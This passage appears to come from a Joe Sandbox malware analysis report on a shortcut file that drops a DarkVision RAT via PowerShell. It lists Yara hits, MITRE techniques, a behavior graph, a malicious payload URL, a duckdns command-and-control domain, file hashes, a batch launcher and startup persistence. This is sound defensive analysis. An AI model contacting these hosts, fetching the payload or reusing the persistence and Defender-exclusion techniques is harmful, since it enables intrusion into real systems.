                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

                            Stealing of Sensitive Information

                            barindex
                            Yara detected DarkVision Rat
                            Source: Yara matchFile source: 20.0.explorers.exe.7ff74afd0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.0.file.exe.7ff727cf0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.file.exe.7ff727cf0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.0.explorers.exe.7ff74afd0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.explorers.exe.7ff74afd0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 20.2.explorers.exe.7ff74afd0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.explorer.exe.2f50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000003.00000002.1486314495.00007FF727D2A000.00000080.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1467222665.000000000482B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.3824651062.00007FF74B00A000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000003.1498847581.0000000003D6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000003.1503466850.0000000003D6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000003.1509023069.0000000003D6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000000.1471512303.00007FF74AFD1000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000014.00000000.1628963449.00007FF74AFD1000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000014.00000002.1652741923.00007FF74B00A000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.1463459263.00007FF727CF1000.00000080.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1470437170.0000000004826000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: file.exe PID: 5980, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: explorers.exe PID: 1224, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3996, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: explorers.exe PID: 2092, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\file.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\explorers\explorers.exe, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Yara detected DarkVision Rat
                            Source: Yara matchFile source: 20.0.explorers.exe.7ff74afd0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.0.file.exe.7ff727cf0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.file.exe.7ff727cf0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.0.explorers.exe.7ff74afd0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.explorers.exe.7ff74afd0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 20.2.explorers.exe.7ff74afd0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.explorer.exe.2f50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000003.00000002.1486314495.00007FF727D2A000.00000080.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1467222665.000000000482B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.3824651062.00007FF74B00A000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000003.1498847581.0000000003D6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000003.1503466850.0000000003D6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000003.1509023069.0000000003D6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000000.1471512303.00007FF74AFD1000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000014.00000000.1628963449.00007FF74AFD1000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000014.00000002.1652741923.00007FF74B00A000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.1463459263.00007FF727CF1000.00000080.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1470437170.0000000004826000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: file.exe PID: 5980, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: explorers.exe PID: 1224, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3996, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: explorers.exe PID: 2092, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\file.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\explorers\explorers.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting                            		Valid Accounts12
                            Command and Scripting Interpreter                            		1
                            Scripting                            		1
                            Abuse Elevation Control Mechanism                            		1
                            Disable or Modify Tools                            		OS Credential Dumping2
                            File and Directory Discovery                            		Remote Services1
                            Archive Collected Data                            		12
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts2
                            PowerShell                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory111
                            System Information Discovery                            		Remote Desktop ProtocolData from Removable Media1
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAt2
                            Registry Run Keys / Startup Folder                            		211
                            Process Injection                            		1
                            Abuse Elevation Control Mechanism                            		Security Account Manager221
                            Security Software Discovery                            		SMB/Windows Admin SharesData from Network Shared Drive1
                            Non-Standard Port                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                            Registry Run Keys / Startup Folder                            		1
                            Obfuscated Files or Information                            		NTDS11
                            Process Discovery                            		Distributed Component Object ModelInput Capture2
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Software Packing                            		LSA Secrets41
                            Virtualization/Sandbox Evasion                            		SSHKeylogging122
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            DLL Side-Loading                            		Cached Domain Credentials1
                            Application Window Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                            Masquerading                            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                            Modify Registry                            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
                            Virtualization/Sandbox Evasion                            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron211
                            Process Injection                            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581391 Sample: LPO-0048532025.lnk Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 53 freespace2384.duckdns.org 2->53 77 Suricata IDS alerts for network traffic 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 Antivirus detection for URL or domain 2->81 85 12 other signatures 2->85 10 powershell.exe 14 20 2->10         started        15 cmd.exe 1 2->15         started        signatures3 83 Uses dynamic DNS services 53->83 process4 dnsIp5 57 87.120.113.91, 49721, 80 UNACS-AS-BG8000BurgasBG Bulgaria 10->57 51 C:\Users\user\AppData\Local\Temp\file.exe, PE32+ 10->51 dropped 99 Powershell drops PE file 10->99 17 file.exe 3 3 10->17         started        21 conhost.exe 1 10->21         started        101 Windows shortcut file (LNK) starts blacklisted processes 15->101 23 cmd.exe 1 15->23         started        25 conhost.exe 1 15->25         started        file6 signatures7 process8 file9 49 C:\ProgramData\explorers\explorers.exe, PE32+ 17->49 dropped 59 Windows shortcut file (LNK) starts blacklisted processes 17->59 61 Multi AV Scanner detection for dropped file 17->61 63 Detected unpacking (changes PE section rights) 17->63 65 4 other signatures 17->65 27 explorers.exe 3 17->27         started        30 cmd.exe 1 17->30         started        32 explorers.exe 23->32         started        signatures10 process11 signatures12 87 Windows shortcut file (LNK) starts blacklisted processes 27->87 89 Multi AV Scanner detection for dropped file 27->89 91 Detected unpacking (changes PE section rights) 27->91 97 3 other signatures 27->97 34 cmd.exe 1 27->34         started        37 explorer.exe 4 27->37         started        93 Adds a directory exclusion to Windows Defender 30->93 40 powershell.exe 23 30->40         started        42 conhost.exe 30->42         started        95 Found direct / indirect Syscall (likely to bypass EDR) 32->95 process13 dnsIp14 67 Windows shortcut file (LNK) starts blacklisted processes 34->67 69 Adds a directory exclusion to Windows Defender 34->69 44 powershell.exe 34->44         started        47 conhost.exe 34->47         started        55 freespace2384.duckdns.org 87.121.86.214, 3441, 49762, 49768 SKATTV-ASBG Bulgaria 37->55 71 System process connects to network (likely due to code injection or exploit) 37->71 73 Tries to evade debugger and weak emulator (self modifying code) 37->73 75 Loading BitLocker PowerShell Module 40->75 signatures15 process16 signatures17 103 Loading BitLocker PowerShell Module 44->103

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            LPO-0048532025.lnk21%ReversingLabsScript-BAT.Downloader.Heuristic
                            LPO-0048532025.lnk100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\ProgramData\explorers\explorers.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\file.exe100%Joe Sandbox ML
                            C:\ProgramData\explorers\explorers.exe45%ReversingLabsWin64.Trojan.Generic
                            C:\Users\user\AppData\Local\Temp\file.exe45%ReversingLabsWin64.Trojan.Generic

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://87.120.113.910%Avira URL Cloudsafe
                            http://87.120.113.91/image.exe100%Avira URL Cloudmalware

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            s-part-0035.t-0009.t-msedge.net
                            		13.107.246.63
                            		truefalse
                              		high
                              freespace2384.duckdns.org
                              		87.121.86.214
                              		truetrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://87.120.113.91/image.exetrue
                                • Avira URL Cloud: malware
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1500121641.0000025A901BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1500121641.0000025A90078000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1466537261.0000025A80232000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1466537261.0000025A80232000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://go.micropowershell.exe, 00000000.00000002.1466537261.0000025A80C32000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://87.120.113.91powershell.exe, 00000000.00000002.1466537261.0000025A80C32000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://contoso.com/powershell.exe, 00000000.00000002.1500121641.0000025A90078000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1500121641.0000025A901BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1500121641.0000025A90078000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.microsoft.copowershell.exe, 00000000.00000002.1516784530.0000025AE89C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Licensepowershell.exe, 00000000.00000002.1500121641.0000025A90078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/Iconpowershell.exe, 00000000.00000002.1500121641.0000025A90078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://aka.ms/pscore68powershell.exe, 00000000.00000002.1466537261.0000025A80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1466537261.0000025A80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1466537261.0000025A80232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        87.120.113.91
                                                        		unknownBulgaria
                                                        		25206UNACS-AS-BG8000BurgasBGtrue
                                                        87.121.86.214
                                                        		freespace2384.duckdns.orgBulgaria
                                                        		34577SKATTV-ASBGtrue

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1581391
                                                        Start date and time:2024-12-27 14:52:36 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 9m 58s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:23
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Sample name:LPO-0048532025.lnk
                                                        Detection:MAL
                                                        Classification:mal100.troj.expl.evad.winLNK@24/17@4/2
                                                        EGA Information:
                                                        • Successful, ratio: 25%
                                                        HCA Information:Failed
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .lnk
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56, 20.12.23.50
                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target explorers.exe, PID 1224 because there are no executed function
                                                        • Execution Graph export aborted for target file.exe, PID 5980 because there are no executed function
                                                        • Execution Graph export aborted for target powershell.exe, PID 7672 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: LPO-0048532025.lnk

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        08:53:37API Interceptor80x Sleep call for process: powershell.exe modified
                                                        08:54:20API Interceptor8251124x Sleep call for process: explorers.exe modified
                                                        08:54:23API Interceptor7912526x Sleep call for process: explorer.exe modified
                                                        14:53:55AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{BE5C9BF3-0A41-4A6C-B6A8-511461B7BEF1}.lnk

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        No context

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        s-part-0035.t-0009.t-msedge.netIzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                        • 13.107.246.63
                                                        zox1oNM5Xl.exeGet hashmaliciousUnknownBrowse
                                                        • 13.107.246.63
                                                        JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                        • 13.107.246.63
                                                        OTRykEzo6o.exeGet hashmaliciousUnknownBrowse
                                                        • 13.107.246.63
                                                        wceaux.dll.dllGet hashmaliciousUnknownBrowse
                                                        • 13.107.246.63
                                                        wp.batGet hashmaliciousUnknownBrowse
                                                        • 13.107.246.63
                                                        https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102Get hashmaliciousUnknownBrowse
                                                        • 13.107.246.63
                                                        RDb082EApV.exeGet hashmaliciousLummaCBrowse
                                                        • 13.107.246.63
                                                        GnHq2ZaBUl.exeGet hashmaliciousLummaCBrowse
                                                        • 13.107.246.63
                                                        EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                        • 13.107.246.63

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        UNACS-AS-BG8000BurgasBG39382629.exeGet hashmaliciousRedLineBrowse
                                                        • 87.120.120.7
                                                        bot.ppc.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                        • 87.120.112.234
                                                        bot.mips.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                        • 87.120.112.234
                                                        bot.sh4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                        • 87.120.112.234
                                                        bot.arm.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                        • 87.120.112.234
                                                        arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 87.120.114.32
                                                        x86_64.elfGet hashmaliciousMiraiBrowse
                                                        • 87.120.114.32
                                                        bot.mpsl.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                        • 87.120.112.234
                                                        bot.m68k.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                        • 87.120.112.234
                                                        bot.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 87.120.112.234
                                                        SKATTV-ASBGarm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 87.120.187.226
                                                        Pago.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                                        • 87.121.86.205
                                                        yIla7SeJ6r.docGet hashmaliciousXenoRATBrowse
                                                        • 87.121.86.205
                                                        Outstanding_Payment.vbsGet hashmaliciousUnknownBrowse
                                                        • 87.121.86.205
                                                        Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                        • 87.121.86.105
                                                        RHxJqGoGFB.exeGet hashmaliciousSalityBrowse
                                                        • 94.156.127.59
                                                        yVVZdG2NJX.exeGet hashmaliciousGuLoaderBrowse
                                                        • 87.121.86.8
                                                        https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzubGet hashmaliciousUnknownBrowse
                                                        • 87.121.86.72
                                                        http://cl4ycra.hgzcbqsqumhkfshql.com/kxosbfkveGet hashmaliciousUnknownBrowse
                                                        • 87.121.86.72
                                                        [EXTERNAL] Oakville shared ''o_akville_853473074_21.11.2024''.emlGet hashmaliciousUnknownBrowse
                                                        • 87.121.86.72

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\ProgramData\explorers\explorers.exe

                                                        Download File
                                                        Process:C:\Users\user\AppData\Local\Temp\file.exe
                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):4312064
                                                        Entropy (8bit):5.975451257646493
                                                        Encrypted:false
                                                        SSDEEP:49152:0WMGLpZbOwUvMB/gDck3KcbW4gtRt7P7KUV85:1xB/Mt3jW9BP7KUVc
                                                        MD5:A3A87410C13CC37B48A9D63D84798A26
                                                        SHA1:170685B36CE0C7CA791B80886E88F3955A707527
                                                        SHA-256:BBB59F158A76D0B043C7D050BBA4C4AD82B94D383F9DB265119A24360D7279E4
                                                        SHA-512:1E7071749D1E96674A6A802A6317E7F71350975516F0C75FE0D0F6D987AD5D6DB91FF6CBA43A8C03117DDAECCC2AC40E97F10F2CBA20204A645E9369FB38B543
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: C:\ProgramData\explorers\explorers.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\ProgramData\explorers\explorers.exe, Author: Joe Security
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\ProgramData\explorers\explorers.exe, Author: ditekSHen
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 45%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ a.[A..[A..[A..47.._A..@..QA..R9..XA..R9..ZA..R9..RA..[A..%A..@...A..@..2A..@..ZA..@..ZA..Rich[A..........PE..d...M.6g.........."......|............A........@..............................B......%B...@................................................................. .A.@................................................................................................... . .p.......p..................@....rsrc...............................@....idata ............................@...gvpobjry.0:......&:.................@...raqptenq......A.......A.............@....pdata.I. ....A.......A.............@..@................................................................................................................................................................................................................................................................

                                                        C:\ProgramData\{F507C7EB-0460-419E-BE06-0FA6DFA315DF}\{C0EDD55B-2610-4BC4-A06C-A014DB07F034}.bat

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:DOS batch file, ASCII text
                                                        Category:dropped
                                                        Size (bytes):105
                                                        Entropy (8bit):5.076423999483216
                                                        Encrypted:false
                                                        SSDEEP:3:mKDDRc29mbZkRECjM/XKmekThW/8gXu1Yn:htJEip2apl/8GLn
                                                        MD5:EFA6052A7207A208713CFC81C67AF59D
                                                        SHA1:8739578A183D2C547259AB845C523282764B30FB
                                                        SHA-256:93BB74E58722959390BA4D9A8C628696492DDE7B036F14AA18ABB6F673055B45
                                                        SHA-512:87B02769841C6404C7E8072EF8C3435F8A2D883A26F6494D3F6720C40C29E5BF594E1560E5DDC84FB7CEE9B00C1E1D6022C76804AA7DA33BD6870F863DBB68CA
                                                        Malicious:false
                                                        Preview:@echo off.cmd /c start "" "C:\ProgramData\explorers\explorers.exe" {8C297CC8-E374-4152-AC22-8BDCBA90B505}

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):0.34726597513537405
                                                        Encrypted:false
                                                        SSDEEP:3:Nlll:Nll
                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                        Malicious:false
                                                        Preview:@...e...........................................................

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qvhebub.fxr.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
